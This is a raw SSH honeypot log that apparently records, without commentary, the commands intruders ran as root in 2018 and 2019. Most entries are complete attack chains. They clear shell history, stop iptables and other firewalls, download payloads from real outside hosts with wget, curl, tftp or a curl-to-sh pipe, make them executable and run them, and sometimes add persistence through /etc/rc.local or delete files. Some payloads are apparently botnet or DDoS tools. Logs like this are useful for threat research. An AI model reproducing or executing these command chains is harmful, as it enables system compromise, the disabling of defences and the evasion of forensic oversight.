Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 9-Dec-2019 14:06:06 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 9-Dec-2019 15:35:16 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 9-Dec-2019 15:49:29 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 16-Dec-2019 12:50:51 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=30 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=30 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=30 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=30 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 31.30.120.136 16-Dec-2019 12:58:05 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;rm -rf zyk;wget -q --timeout=30 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk .a;cd /tmp;
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
rm -rf zyk
wget -q --timeout=30 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk .a
cd /tmp

From 46.246.42.147 16-Dec-2019 17:45:29 ssh2 root
Exec wget; curl
wget
curl

From 31.30.120.136 18-Dec-2019 06:03:38 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;chmod +x zyk;./zyk >>/dev/null;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
chmod +x zyk
./zyk >>/dev/null
rm -rf zyk
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;chmod +x zyk;./zyk >>/dev/null;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
chmod +x zyk
./zyk >>/dev/null
rm -rf zyk

From 31.30.120.136 18-Dec-2019 06:05:05 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;chmod +x zyk;./zyk >>/dev/null;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
chmod +x zyk
./zyk >>/dev/null
rm -rf zyk

From 13.124.221.68 20-Dec-2019 09:44:28 ssh2 root
wget http://216.176.179.106:9090/22001
wget https://nodejs.org/dist/v10.16.0/node-v10.16.0-linux-x64.tar.xz

From 78.167.245.115 20-Dec-2019 13:14:48 ssh2 root
ethtool eth0
apt-get install ethtool

From 104.168.201.226 22-Dec-2019 20:52:03 ssh2 root
Exec nproc;
nproc

From 183.2.247.81 23-Dec-2019 17:13:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.2.247.81:2688/LinuxTF;chmod 777 LinuxTF;./LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.2.247.81:2688/LinuxTF
chmod 777 LinuxTF
./LinuxTF

From 183.2.247.81 23-Dec-2019 17:21:52 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.2.247.81:2688/MipsLinuxTF;chmod 777 MipsLinuxTF;./MipsLinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.2.247.81:2688/MipsLinuxTF
chmod 777 MipsLinuxTF
./MipsLinuxTF

From 76.12.219.151 24-Dec-2019 14:49:19 ssh2 root
Exec uname -a & curl -O ftp://111.205.46.7/zu ; perl zu ; rm -rf zu
uname -a
curl -O ftp://111.205.46.7/zu
perl zu
rm -rf zu
Exec uname -a & curl -O ftp://111.205.46.7/zu ; perl zu ; rm -rf zu
uname -a
curl -O ftp://111.205.46.7/zu
perl zu
rm -rf zu
Exec uname -a & curl -O ftp://111.205.46.7/zu ; perl zu ; rm -rf zu
uname -a
curl -O ftp://111.205.46.7/zu
perl zu
rm -rf zu
Exec uname -a & curl -O ftp://111.205.46.7/zu ; perl zu ; rm -rf zu
uname -a
curl -O ftp://111.205.46.7/zu
perl zu
rm -rf zu

From 76.12.219.151 24-Dec-2019 14:49:20 ssh2 root
Exec uname -a & curl -O ftp://111.205.46.7/zu ; perl zu ; rm -rf zu
uname -a
curl -O ftp://111.205.46.7/zu
perl zu
rm -rf zu

From 115.230.124.126 24-Dec-2019 15:23:22 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.230.124.126:2688/ARM4LinuxTF;chmod 777 ARM4LinuxTF;./ARM4LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.230.124.126:2688/ARM4LinuxTF
chmod 777 ARM4LinuxTF
./ARM4LinuxTF

From 115.230.124.126 24-Dec-2019 15:24:22 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.230.124.126:2688/MipsLinuxTF;chmod 777 MipsLinuxTF;./MipsLinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.230.124.126:2688/MipsLinuxTF
chmod 777 MipsLinuxTF
./MipsLinuxTF

From 115.230.124.126 24-Dec-2019 15:24:22 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.230.124.126:2688/ARM6LinuxTF;chmod 777 ARM6LinuxTF;./ARM6LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.230.124.126:2688/ARM6LinuxTF
chmod 777 ARM6LinuxTF
./ARM6LinuxTF

From 115.230.124.126 24-Dec-2019 15:24:36 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.230.124.126:2688/LinuxTF;chmod 777 LinuxTF;./LinuxTF;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.230.124.126:2688/LinuxTF
chmod 777 LinuxTF
./LinuxTF

From 13.125.181.63 24-Dec-2019 22:13:20 ssh2 root
wget https://nodejs.org/dist/v10.16.0/node-v10.16.0-linux-x64.tar.xz

File: fakesshd-log-2018.txt


From 192.99.100.158  9-Jan-2018 15:43:01 ssh2 root
Exec uname -a & lscpu & free -mt
uname -a & lscpu & free -mt

From 31.192.105.199 11-Jan-2018 12:52:55 ssh2 root
Exec wget http://27.255.91.139:1234/sshd -O /tmp/sshd
wget http://27.255.91.139:1234/sshd -O /tmp/sshd

From 61.171.158.11 13-Jan-2018 22:17:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://win.pj0.pw:54321/new26;chmod 777 new26;./new26;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://win.pj0.pw:54321/new26
chmod 777 new26
./new26

From 183.17.59.49 14-Jan-2018 12:56:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://103.104.106.90:808/java;chmod 777 java;./java;echo "cd /tmp/">>/etc/rc.local;echo "./java&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; 
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://103.104.106.90:808/java
chmod 777 java
./java
echo "cd /tmp/">>/etc/rc.local
echo "./java&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 115.207.120.226 14-Jan-2018 22:42:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.27.28:818/lihai;chmod 777 lihai;./lihai;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.27.28:818/lihai
chmod 777 lihai
./lihai

From 219.234.3.6 15-Jan-2018 10:01:37 ssh2 root
Exec echo 'working4141';
echo 'working4141'

From 115.207.120.226 15-Jan-2018 23:08:05 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.27.28:818/tret;chmod 777 tret;./tret;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.27.28:818/tret
chmod 777 tret
./tret

From 115.207.120.226 16-Jan-2018 04:01:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.27.28:818/test;chmod 777 test;./test;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.27.28:818/test
chmod 777 test
./test

From 115.207.120.226 16-Jan-2018 13:47:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.42.143:818/nud;chmod 777 nud;./nud;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.42.143:818/nud
chmod 777 nud
./nud

From 115.207.120.226 17-Jan-2018 04:26:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.42.143:818/uxd;chmod 777 uxd;./uxd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.42.143:818/uxd
chmod 777 uxd
./uxd

From 115.207.120.226 17-Jan-2018 14:12:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.42.143:818/yutr;chmod 777 yutr;./yutr;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.42.143:818/yutr
chmod 777 yutr
./yutr

From 104.160.185.192 19-Jan-2018 15:03:17 ssh2 root
Exec uname -n -r -s -v
uname -n -r -s -v

From 60.250.99.131 21-Jan-2018 11:00:53 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://60.250.99.131:9998/services;chmod 777 services;./services;echo "cd /tmp/">>/etc/rc.local;echo "./services&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp
wget -c http://60.250.99.131:9998/services
chmod 777 services
./services
echo "cd /tmp/">>/etc/rc.local
echo "./services&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

From 185.58.193.149 21-Jan-2018 20:47:01 ssh2 root
Exec bash;
sh;
enable;
system;
cat | sh;
bash
sh
enable
system
cat | sh

From 185.58.193.149 22-Jan-2018 11:26:13 ssh2 root
Exec cd /tmp;wget http://185.58.193.149/botz.sh;chmod +x *;sh botz.sh
cd /tmp
wget http://185.58.193.149/botz.sh
chmod +x *
sh botz.sh

From 185.58.193.149 22-Jan-2018 16:19:17 ssh2 root
Exec cd /tmp;wget http://185.58.193.149/botz.sh;chmod +x *;sh botz.sh;cd /tmp;curl http://185.58.193.149/botz.sh >> botz.sh;chmod +x *;sh botz.sh
cd /tmp
wget http://185.58.193.149/botz.sh
chmod +x *
sh botz.sh
cd /tmp
curl http://185.58.193.149/botz.sh >> botz.sh
chmod +x *
sh botz.sh

From 220.163.125.147 24-Jan-2018 01:00:57 ssh2 root
Exec curl -fsSL http://165.225.157.157:8000/i.sh | sh
curl -fsSL http://165.225.157.157:8000/i.sh | sh

From 185.58.193.149 24-Jan-2018 02:30:45 ssh2 root
Exec cd /tmp;rm -rf *;wget http://185.58.193.149/botz.sh;chmod +x *;sh botz.sh;cd /tmp;curl http://185.58.193.149/botz.sh >> botz.sh;chmod +x *;sh botz.sh
cd /tmp
rm -rf *
wget http://185.58.193.149/botz.sh
chmod +x *
sh botz.sh
cd /tmp
curl http://185.58.193.149/botz.sh >> botz.sh
chmod +x *
sh botz.sh

From 185.58.193.149 24-Jan-2018 12:16:53 ssh2 root
Exec cd /tmp;rm -rf *;wget http://178.128.185.250/e -O botzz.sh;chmod +x *;sh botzz.sh
cd /tmp
rm -rf *
wget http://178.128.185.250/e -O botzz.sh
chmod +x *
sh botzz.sh

From 183.60.107.165 24-Jan-2018 17:09:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.60.107.165:6547/Linux2.6;chmod 777 Linux2.6;./Linux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.60.107.165:6547/Linux2.6
chmod 777 Linux2.6
./Linux2.6

From 140.143.35.89 30-Jan-2018 19:41:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://122.152.219.127:54321/xxs66;chmod 777 xxs66;./xxs66;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://122.152.219.127:54321/xxs66
chmod 777 xxs66
./xxs66

From 140.143.35.89  4-Feb-2018 02:16:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://140.143.35.89:43768/xxs66;chmod 777 xxs66;./xxs66;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://140.143.35.89:43768/xxs66
chmod 777 xxs66
./xxs66

From 185.58.193.149  8-Feb-2018 13:43:49 ssh2 root
Exec cd /tmp; rm -rf *; wget http://199.195.254.118/sh.sh; /bin/busybox curl -O http://199.195.254.118/sh.sh; /bin/busybox wget http://199.195.254.118/sh.sh; sh sh.sh;
cd /tmp
rm -rf *
wget http://199.195.254.118/sh.sh
/bin/busybox curl -O http://199.195.254.118/sh.sh
/bin/busybox wget http://199.195.254.118/sh.sh
sh sh.sh

From 185.220.101.46  9-Feb-2018 20:38:39 ssh2 root
Exec uname -s
uname -s

From 82.211.44.44 14-Feb-2018 01:36:37 ssh2 root
Exec wget -q -O - http://dl.peanutman.ru/ptshell|sh && curl -fsSL http://dl.peanutman.ru/ptshell|sh
wget -q -O - http://dl.peanutman.ru/ptshell|sh && curl -fsSL

From 185.58.193.149 14-Feb-2018 21:08:53 ssh2 root
Exec wget http://185.58.193.149/root-1234
wget http://185.58.193.149/root-1234

From 119.29.190.75 20-Feb-2018 13:54:45 ssh2 root
Exec curl -fsSL http://120.25.66.201:8000/i.sh | sh
curl -fsSL http://120.25.66.201:8000/i.sh | sh

From 164.132.58.90 23-Feb-2018 10:17:41 ssh2 root
Exec uname -n -s -r -v ; curl -O adyhax0r.000webhostapp.com/ddos ; perl ddos ; rm -rf ddos ; history -c
uname -n -s -r -v
curl -O adyhax0r.000webhostapp.com/ddos
perl ddos
rm -rf ddos
history -c

From 222.82.245.76 25-Feb-2018 09:13:27 ssh2 root
Exec cd /tmp; wget http://185.244.25.153/ww || curl -O http://185.244.25.153/ww; chmod 777 ww; sh ww; rm -rf ww; tftp 46.243.189.109 -c get tt; chmod 777 tt; sh tt; tftp -r tt1 -g 46.243.189.109; chmod 777 tt1; sh tt1;rm -rf /var/tmp/; rm -rf /var/tmp/.
cd /tmp
wget http://185.244.25.153/ww || curl -O http://185.244.25.153/ww
chmod 777 ww
sh ww
rm -rf ww
tftp 46.243.189.109 -c get tt
chmod 777 tt
sh tt
tftp -r tt1 -g 46.243.189.109
chmod 777 tt1
sh tt1
rm -rf /var/tmp/
rm -rf /var/tmp/.

From 180.139.100.108 26-Feb-2018 21:19:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http;Lin5ux2.6 777 Lin5ux2.6;./Lin5ux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http
Lin5ux2.6 777 Lin5ux2.6
./Lin5ux2.6

From 222.82.245.76 27-Feb-2018 12:58:17 ssh2 root
Exec  cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.153/8UsA.sh; curl -O http://185.244.25.153/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 185.244.25.153 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 185.244.25.153; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.244.25.153 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt
wget http://185.244.25.153/8UsA.sh
curl -O http://185.244.25.153/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 185.244.25.153 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 185.244.25.153
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 116.230.199.212 28-Feb-2018 02:38:13 ssh2 root
Exec cd /tmp;/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c -t 10 -T 10 http://140.143.35.89:43768/com.json;wget -c -t 10 -T 10 http://140.143.35.89:43768/zjgw;chmod 777 zjgw;./zjgw --config
cd /tmp
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c -t 10 -T 10 http://140.143.35.89:43768/com.json
wget -c -t 10 -T 10 http://140.143.35.89:43768/zjgw
chmod 777 zjgw
./zjgw --config

From 146.185.239.17 13-Mar-2018 08:09:13 ssh2 root
w
cat /pro cp
cat /proc/cpuinfo
w
ps ax
/sbin/ifconfig
arp -a
/sbin/arp -a
gcc
whereis arp
wget
uptime
cat /etc/passwd
ps
last
exit

From 60.13.226.161 25-Mar-2018 14:11:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://60.13.226.161:6487/mprs.6;chmod 777 mprs.6;./mprs.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://60.13.226.161:6487/mprs.6
chmod 777 mprs.6
./mprs.6

From 60.13.226.161 27-Mar-2018 15:02:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://103.255.177.139:280/Lin5ux2.6;chmod 777 Lin5ux2.6;./Lin5ux2.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://103.255.177.139:280/Lin5ux2.6
chmod 777 Lin5ux2.6
./Lin5ux2.6

From 77.87.77.147 29-Mar-2018 21:11:58 ssh2 root
mv .bash_history .bash_history2 free -m cat /proc/cpuinfo| grep
wget
cd /etc wget http://www.asdq.cf:67/wget.sh chmod 777 wget.sh ./wget.sh
cd /etc
wget http://www.asdq.cf:67/wget.sh
chmod 777 wget.sj
./wget.sh
cd /etc curl -o curl.sh http://www.asdq.cf:67/curl.sh chmod 777
curl -o curl.sh http://www.asdq.cf:67/curl.sh
wget
wget -o wget.sh http://www.asdq.cf:67/wget.sh
cd
mv .bash_history2 .bash_history
vi .bash_history 

From 77.87.77.147 30-Mar-2018 11:25:09 ssh2 root
mv .bash_history .bash_history2 free -m cat /proc/cpuinfo| grep
wget
cd /etc wget http://www.asdq.cf:67/wget.sh chmod 777 wget.sh ./wget.sh
cd /etc
